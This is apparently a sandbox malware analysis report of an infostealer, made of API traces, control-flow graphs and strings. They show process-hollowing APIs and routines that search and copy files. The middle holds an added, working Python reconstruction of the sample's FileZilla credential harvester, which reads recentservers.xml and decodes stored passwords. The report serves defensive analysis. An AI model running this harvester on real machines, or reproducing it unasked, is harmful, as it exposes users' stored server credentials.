                                                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 0035596F
                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00355985
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035598E
• Sleep.KERNEL32(0000000C), ref: 00355995
• Sleep.KERNEL32(0000000C), ref: 0035599C
• Sleep.KERNEL32(0000000C), ref: 003559A3
• Sleep.KERNEL32(0000000C), ref: 003559AA
• Sleep.KERNEL32(0000000C), ref: 003559B1
• Sleep.KERNEL32(0000000C), ref: 003559B8
• Sleep.KERNEL32(0000000C), ref: 003559BF
• Sleep.KERNEL32(0000000C), ref: 003559C6
• Sleep.KERNEL32(0000000C), ref: 003559CD
• Sleep.KERNEL32(0000000C), ref: 003559D4
• Sleep.KERNEL32(0000000C), ref: 003559DB
• Sleep.KERNEL32(0000000C), ref: 003559E2
• Sleep.KERNEL32(0000000C), ref: 003559E9
• Sleep.KERNEL32(0000000C), ref: 003559F0
• Sleep.KERNEL32(0000000C), ref: 003559F7
• Sleep.KERNEL32(0000000C), ref: 003559FE
• Sleep.KERNEL32(0000000C), ref: 00355A05
• Sleep.KERNEL32(0000000C), ref: 00355A0C
• Sleep.KERNEL32(0000000C), ref: 00355A13
• Sleep.KERNEL32(0000000C), ref: 00355A1A
• Sleep.KERNEL32(0000000C), ref: 00355A21
• Sleep.KERNEL32(0000000C), ref: 00355A28
• Sleep.KERNEL32(0000000C), ref: 00355A2F
• Sleep.KERNEL32(0000000C), ref: 00355A36
• Sleep.KERNEL32(0000000C), ref: 00355A3D
• Sleep.KERNEL32(0000000C), ref: 00355A44
• Sleep.KERNEL32(0000000C), ref: 00355A4B
• Sleep.KERNEL32(0000000C), ref: 00355A52
• Sleep.KERNEL32(0000000C), ref: 00355A59
• Sleep.KERNEL32(0000000C), ref: 00355A60
• Sleep.KERNEL32(0000000C), ref: 00355A67
• Sleep.KERNEL32(0000000C), ref: 00355A6E
• Sleep.KERNEL32(0000000C), ref: 00355A75
• Sleep.KERNEL32(0000000C), ref: 00355A7C
• Sleep.KERNEL32(0000000C), ref: 00355A83
• Sleep.KERNEL32(0000000C), ref: 00355A8F
• Sleep.KERNEL32(0000000C), ref: 00355A96
• Sleep.KERNEL32(0000000C), ref: 00355A9D
• Sleep.KERNEL32(0000000C), ref: 00355AA4
• Sleep.KERNEL32(0000000C), ref: 00355AAB
• Sleep.KERNEL32(0000000C), ref: 00355AB2
• Sleep.KERNEL32(0000000C), ref: 00355AB9
• Sleep.KERNEL32(0000000C), ref: 00355AC0
• Sleep.KERNEL32(0000000C), ref: 00355AC7
• Sleep.KERNEL32(0000000C), ref: 00355ACE
• Sleep.KERNEL32(0000000C), ref: 00355AD5
• Sleep.KERNEL32(0000000C), ref: 00355ADC
• Sleep.KERNEL32(0000000C), ref: 00355AE3
• Sleep.KERNEL32(0000000C), ref: 00355AEA
• Sleep.KERNEL32(0000000C), ref: 00355AF1
• Sleep.KERNEL32(0000000C), ref: 00355AF8
• Sleep.KERNEL32(0000000C), ref: 00355AFF
• Sleep.KERNEL32(0000000C), ref: 00355B06
• CloseHandle.KERNEL32(00000000), ref: 00355B0D
• ExitProcess.KERNEL32 ref: 00355B14
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Sleep$AddressProc$Heap$Process$File$CloseCreateEventHandleLibraryLoadWindowlstrcpy$ExitMessageOpenmemsetstrcmp$AllocAllocateByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiNamePathReadRegisterSectionSpinTempUserVisibleWideWrite_time64lstrcatlstrlenrandsrandwsprintf
• String ID: GetSystemInfo$GetSystemTime$Sleep
• API String ID: 1759865767-3040144824
• Opcode ID: 5ef56ac24cd95238b9ef26ea25e5ef20bfa433a8fe682aeec83b04af3709624b
• Instruction ID: 95552c75dedf024c4970727e2ff40c3501d86d41b8bafe9688b9526500adf2e6
• Opcode Fuzzy Hash: 5ef56ac24cd95238b9ef26ea25e5ef20bfa433a8fe682aeec83b04af3709624b
• Instruction Fuzzy Hash: 40F1A4B180B516ABD7C2BBF0EC4DCDEBA7CAE467027018524F71AA5061DF2856C38B65

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 603 355edc-355ee3 604 355ee9-356356 GetProcAddress * 50 603->604 605 35635b-3563fa LoadLibraryA * 9 603->605 604->605 606 3563fc-356465 GetProcAddress * 5 605->606 607 35646a-356471 605->607 606->607 608 356477-356525 GetProcAddress * 8 607->608 609 35652a-356531 607->609 608->609 610 3565a1-3565a8 609->610 611 356533-35659c GetProcAddress * 5 609->611 612 356633-35663a 610->612 613 3565ae-35662e GetProcAddress * 6 610->613 611->610 614 356640-356705 GetProcAddress * 9 612->614 615 35670a-356711 612->615 613->612 614->615 616 356781-356788 615->616 617 356713-35677c GetProcAddress * 5 615->617 618 3567b3-3567ba 616->618 619 35678a-3567ae GetProcAddress * 2 616->619 617->616 620 3567e5-3567ec 618->620 621 3567bc-3567e0 GetProcAddress * 2 618->621 619->618 622 3568d1-3568d8 620->622 623 3567f2-3568cc GetProcAddress * 10 620->623 621->620 624 356931-356938 622->624 625 3568da-35692c GetProcAddress * 4 622->625 623->622 626 35694c-356953 624->626 627 35693a-356947 GetProcAddress 624->627 625->624 628 356955-3569a7 GetProcAddress * 4 626->628 629 3569ac-3569b3 626->629 627->626 628->629 630 3569b5-3569c1 GetProcAddress 629->630 631 3569c6 629->631 630->631
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
• API String ID: 2238633743-2740034357
• Opcode ID: 6039fd22c81bf9552f777e8f95d89385333c3c7a08ce69ef3a65fc3000bc13c5
• Instruction ID: 40b57893b8fe9a6ca1be1fd16e1ff51a611149c92b6b0a8fbb9aad19e5059180
• Opcode Fuzzy Hash: 6039fd22c81bf9552f777e8f95d89385333c3c7a08ce69ef3a65fc3000bc13c5
• Instruction Fuzzy Hash: F152BD75509600EFEB02DFE0EE4996D3B76F748381344C5A6F90A91A70D7B24AA3EF50

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 636 34b030-34b0c6 call 34e57d call 34f83b call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e5b4 call 3469a2 659 34b0cc-34b0db call 34f884 636->659 660 34b45a-34b46e call 34e5e8 call 341301 636->660 659->660 666 34b0e1-34b131 strtok_s call 34e57d * 4 GetProcessHeap HeapAlloc 659->666 676 34b137 666->676 677 34b3c9-34b455 lstrlenA call 34e57d call 341324 call 3526f8 call 34e5e8 memset call 34e72d * 4 call 34e5e8 * 4 666->677 679 34b13c-34b14a StrStrA 676->679 677->660 680 34b177-34b185 StrStrA 679->680 681 34b14c-34b172 lstrlenA call 34fc4f call 34e63b call 34e5e8 679->681 684 34b187-34b1b3 lstrlenA call 34fc4f call 34e63b call 34e5e8 680->684 685 34b1b8-34b1c6 StrStrA 680->685 681->680 684->685 690 34b1f3-34b201 StrStrA 685->690 691 34b1c8-34b1ee lstrlenA call 34fc4f call 34e63b call 34e5e8 685->691 693 34b274-34b288 call 34e766 lstrlenA 690->693 694 34b203-34b249 lstrlenA call 34fc4f call 34e63b call 34e5e8 call 34e766 call 346a41 690->694 691->690 712 34b3ad-34b3c3 strtok_s 693->712 713 34b28e-34b29f call 34e766 lstrlenA 693->713 694->693 738 34b24b-34b26f call 34e5f1 call 34e6d4 call 34e63b call 34e5e8 694->738 712->677 712->679 713->712 725 34b2a5-34b2b6 call 34e766 lstrlenA 713->725 725->712 732 34b2bc-34b2cd call 34e766 lstrlenA 725->732 732->712 742 34b2d3-34b3a8 lstrcatA * 2 call 34e766 lstrcatA * 2 call 34e766 lstrcatA * 3 call 34e766 lstrcatA * 3 call 34e766 lstrcatA * 3 call 34e5f1 * 4 732->742 738->693 742->712
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
  • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
  • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
  • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
  • Part of subcall function 003469A2: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
  • Part of subcall function 003469A2: GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
  • Part of subcall function 003469A2: LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
                                                                                                                                                                                        • Part of subcall function 003469A2: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
                                                                                                                                                                                        • Part of subcall function 003469A2: CloseHandle.KERNEL32(?), ref: 00346A2E
                                                                                                                                                                                        • Part of subcall function 0034F884: LocalAlloc.KERNEL32(00000040,0035158E,ERROR,00361C14,?,0035158D,00000000,00000000), ref: 0034F89D
                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0034B0EA
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F,0035E266,0035E266,0035E266,0035E266), ref: 0034B11F
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0034B126
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 0034B142
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B14D
                                                                                                                                                                                        • Part of subcall function 0034FC4F: malloc.MSVCRT ref: 0034FC58
                                                                                                                                                                                        • Part of subcall function 0034FC4F: strncpy.MSVCRT ref: 0034FC68
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0034B17D
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B188
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 0034B1BE
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B1C9
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0034B1F9
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B204
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B27D
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B297
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B2AE
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034B2C5
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,Soft: FileZilla), ref: 0034B2DB
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,Host: ), ref: 0034B2E9
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B2FB
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361448), ref: 0034B309
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B31B
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B325
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,Login: ), ref: 0034B333
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B345
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B34F
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,Password: ), ref: 0034B35D
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B36F
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B379
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B383
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrlenA.KERNEL32(?,0000000C,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E5FA
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrcpyA.KERNEL32(00000000,00000000,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E62E
                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0034B3B7
                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0034B3CC
                                                                                                                                                                                      • memset.MSVCRT ref: 0034B412
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$f5$passwords.txt
                                                                                                                                                                                      • API String ID: 433178851-3814401924
                                                                                                                                                                                      • Opcode ID: d888f9792c4465902d4fe6fc3947a9c4d509f65d5633878a22fc916ed5d82b59
                                                                                                                                                                                      • Instruction ID: 0e1963e4bf6bfc3aab2b20eee81cac56d4a2829d49d8f48b1fa5ce9a95497443
                                                                                                                                                                                      • Opcode Fuzzy Hash: d888f9792c4465902d4fe6fc3947a9c4d509f65d5633878a22fc916ed5d82b59
                                                                                                                                                                                      • Instruction Fuzzy Hash: BDC12B71900108ABDB06FBE0DD96DEEBBBCBF55301F544465F502AA0A2EF31AB45DB60
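The routine at 0034B030 above is the FileZilla credential harvester: it reads `\AppData\Roaming\FileZilla\recentservers.xml` (subcall 003469A2: CreateFileA / GetFileSizeEx / ReadFile), splits the buffer with strtok_s, runs StrStrA on each token for `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">`, and, only once all four fields are non-empty (the four lstrlenA checks before the lstrcatA chain), concatenates a `Soft: FileZilla` / `Host:` / `Login:` / `Password:` record for `passwords.txt` and clears the four fields (the four 0034E5F1 calls) before the next token. The Python below is an added reconstruction of that loop, written for this page so a defender can see exactly what leaves the host; it is not code from the sample or from the report. Three details are assumptions, because the listing does not resolve them: the strtok_s delimiter is taken to be a newline, the two separator strings shown only as 00361448 and 003613FC are taken to be `:` and a newline, and the base64 password is decoded before being written (the subcall after the `<Pass>` match is not resolved). The XML is constructed for the example.

```python
"""Reconstruction of the FileZilla recentservers.xml harvesting loop at 0x34b030.

Added example, not code from the sample. It mirrors the API trace in the report:
strtok_s over the file, StrStrA for the four tags, lstrcatA to build a record,
then four string resets before the next token.
"""
import base64

# Constructed sample (not a captured file), shaped like the file FileZilla writes
# to %APPDATA%\FileZilla\recentservers.xml. Servers 1 and 3 carry a base64
# password; server 2 uses the legacy plain <Pass> element that older builds wrote.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.0" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
    <Server>
      <Host>legacy.example.test</Host>
      <Port>21</Port>
      <User>bob</User>
      <Pass>plaintext-old-format</Pass>
    </Server>
    <Server>
      <Host>backup.example.test</Host>
      <Port>990</Port>
      <Protocol>3</Protocol>
      <User>carol</User>
      <Pass encoding="base64">UzNjcmV0IQ==</Pass>
    </Server>
  </RecentServers>
</FileZilla3>
"""

# Exact literals from the report's string list. A plain <Pass> never matches TAG_PASS.
TAG_HOST = "<Host>"
TAG_PORT = "<Port>"
TAG_USER = "<User>"
TAG_PASS = '<Pass encoding="base64">'

# Assumed: the report shows only the addresses 0x361448 / 0x3613FC for these separators.
HOST_PORT_SEP = ":"
LINE_SEP = "\n"


def _inner_text(token, open_tag):
    """Equivalent of the lstrlenA + malloc/strncpy subcall (0x34fc4f):
    the text after open_tag up to the next '<'."""
    start = token.index(open_tag) + len(open_tag)
    end = token.find("<", start)
    return token[start:] if end == -1 else token[start:end]


def harvest_filezilla(xml_text, decode_password=True):
    """Return the records the routine would append to passwords.txt, as dicts.

    Fields accumulate across tokens. A record is emitted only when all four are
    non-empty and the fields are cleared afterwards, so an entry whose password is
    not tagged encoding="base64" never completes a record on its own.
    """
    host = port = user = password = ""
    records = []
    for token in xml_text.split(LINE_SEP):   # strtok_s; newline delimiter is assumed
        if TAG_HOST in token:
            host = _inner_text(token, TAG_HOST)
        if TAG_PORT in token:
            port = _inner_text(token, TAG_PORT)
        if TAG_USER in token:
            user = _inner_text(token, TAG_USER)
        if TAG_PASS in token:
            password = _inner_text(token, TAG_PASS)
        if not (host and port and user and password):
            continue
        if decode_password:   # assumed; the subcall after the <Pass> match is unresolved
            shown = base64.b64decode(password).decode("utf-8", "replace")
        else:
            shown = password
        records.append({"host": host, "port": port, "user": user, "password": shown})
        host = port = user = password = ""   # the four 0x34e5f1 resets
    return records


def format_passwords_txt(records):
    """Lay the records out the way the lstrcatA sequence at 0x34b2d3-0x34b383 does."""
    out = []
    for r in records:
        out.append("Soft: FileZilla" + LINE_SEP
                   + "Host: " + r["host"] + HOST_PORT_SEP + r["port"] + LINE_SEP
                   + "Login: " + r["user"] + LINE_SEP
                   + "Password: " + r["password"] + LINE_SEP + LINE_SEP)
    return "".join(out)


if __name__ == "__main__":
    print(format_passwords_txt(harvest_filezilla(SAMPLE_RECENTSERVERS)))
```

Pointing `harvest_filezilla` at a real `%APPDATA%\FileZilla\recentservers.xml` (and `sitemanager.xml`, which uses the same elements) shows the exposure of a given workstation: FileZilla only base64-encodes stored passwords unless a master password is configured, so every entry this loop completes is a plaintext credential once copied off the host. Entries with no stored password, the legacy plain `<Pass>` form, or a master-password-protected password use a different element or attribute and are silently skipped by this routine; the second constructed server above illustrates that.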

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
control_flow_graph 1817 34b957-34b9d8 call 34e57d call 34e682 call 34e6d4 call 34e63b call 34e5e8 * 2 call 34e57d * 2 call 34e766 FindFirstFileA 1836 34c38c-34c3cb call 34e5e8 * 3 call 341301 call 34e5e8 * 3 1817->1836 1837 34b9de-34b9e4 1817->1837 1839 34b9e9-34b9fd StrCmpCA 1837->1839 1841 34ba03-34ba17 StrCmpCA 1839->1841 1842 34c36b-34c37d FindNextFileA 1839->1842 1841->1842 1844 34ba1d-34ba89 call 34e5f1 call 34e682 call 34e6d4 * 2 call 34e63b call 34e5e8 * 3 1841->1844 1842->1839 1845 34c383-34c386 FindClose 1842->1845 1873 34ba8f-34baae call 34e766 StrCmpCA 1844->1873 1874 34bb99-34bc04 call 34e6d4 * 4 call 34e63b call 34e5e8 * 3 1844->1874 1845->1836 1880 34bb26-34bb97 call 34e6d4 * 4 call 34e63b call 34e5e8 * 3 1873->1880 1881 34bab0-34bb21 call 34e6d4 * 4 call 34e63b call 34e5e8 * 3 1873->1881 1923 34bc0a-34bc28 call 34e5e8 call 34e766 StrCmpCA 1874->1923 1880->1923 1881->1923 1932 34bc2e-34bc42 StrCmpCA 1923->1932 1933 34bdda-34bdef StrCmpCA 1923->1933 1932->1933 1934 34bc48-34bd6a call 34e57d call 34f6b1 call 34e6d4 call 34e682 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 5 call 34e766 * 2 CopyFileA call 34e57d call 34e6d4 * 2 call 34e63b call 34e5e8 * 2 call 34e5b4 call 3469a2 1932->1934 1935 34bdf1-34be38 call 341324 call 34e5b4 * 3 call 34b5e5 1933->1935 1936 34be48-34be5d StrCmpCA 1933->1936 2134 34bd6c-34bda6 call 34e5b4 call 341324 call 3526f8 call 34e5e8 1934->2134 2135 34bdab-34bdd5 call 34e766 DeleteFileA call 34e72d call 34e766 call 34e5e8 * 2 1934->2135 1996 34be3d-34be43 1935->1996 1937 34bec5-34bedd call 34e5b4 call 34f80b 1936->1937 1938 34be5f-34be76 call 34e766 StrCmpCA 1936->1938 1960 34bf44-34bf59 StrCmpCA 1937->1960 1961 34bedf-34bee3 1937->1961 1949 34c2f6-34c2fd 1938->1949 1950 34be7c-34be80 1938->1950 1957 34c2ff-34c350 call 34e5b4 * 2 call 34e57d call 341324 call 34b957 1949->1957 1958 34c35b-34c366 call 34e72d * 2 1949->1958 1950->1949 1954 34be86-34bec3 call 341324 call 34e5b4 * 2 1950->1954 2008 34bf29-34bf34 call 34e5b4 call 346e1b 1954->2008 2022 34c355 1957->2022 1958->1842 1973 34c154-34c169 StrCmpCA 1960->1973 1974 34bf5f-34c01b call 34e57d call 34f6b1 call 34e6d4 call 34e682 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 5 call 34e766 * 2 CopyFileA 1960->1974 1961->1949 1968 34bee9-34bf26 call 341324 call 34e5b4 call 34e57d 1961->1968 1968->2008 1973->1949 1977 34c16f-34c22b call 34e57d call 34f6b1 call 34e6d4 call 34e682 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 5 call 34e766 * 2 CopyFileA 1973->1977 2088 34c0c7-34c0e0 call 34e766 StrCmpCA 1974->2088 2089 34c021-34c0bc call 341324 call 34e5b4 * 3 call 34736c call 341324 call 34e5b4 * 3 call 347bb0 1974->2089 2090 34c2d7-34c2e9 call 34e766 DeleteFileA call 34e72d 1977->2090 2091 34c231-34c2cc call 341324 call 34e5b4 * 3 call 34764a call 341324 call 34e5b4 * 3 call 3478c0 1977->2091 1996->1949 2028 34bf39-34bf3f 2008->2028 2022->1958 2028->1949 2101 34c135-34c147 call 34e766 DeleteFileA call 34e72d 2088->2101 2102 34c0e2-34c12a call 341324 call 34e5b4 * 3 call 3480a3 2088->2102 2180 34c0c1 2089->2180 2116 34c2ee 2090->2116 2181 34c2d1 2091->2181 2124 34c14c-34c14f 2101->2124 2158 34c12f 2102->2158 2122 34c2f1 call 34e5e8 2116->2122 2122->1949 2124->2122 2134->2135 2135->1933 2158->2101 2180->2088 2181->2090
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,0035E266,0035E266,00000000,?,?,?,003614B4,0035E266,00000000,0035E266,?), ref: 0034B9CC
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E258), ref: 0034B9F5
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E254), ref: 0034BA0F
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrlenA.KERNEL32(?,0000000C,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E5FA
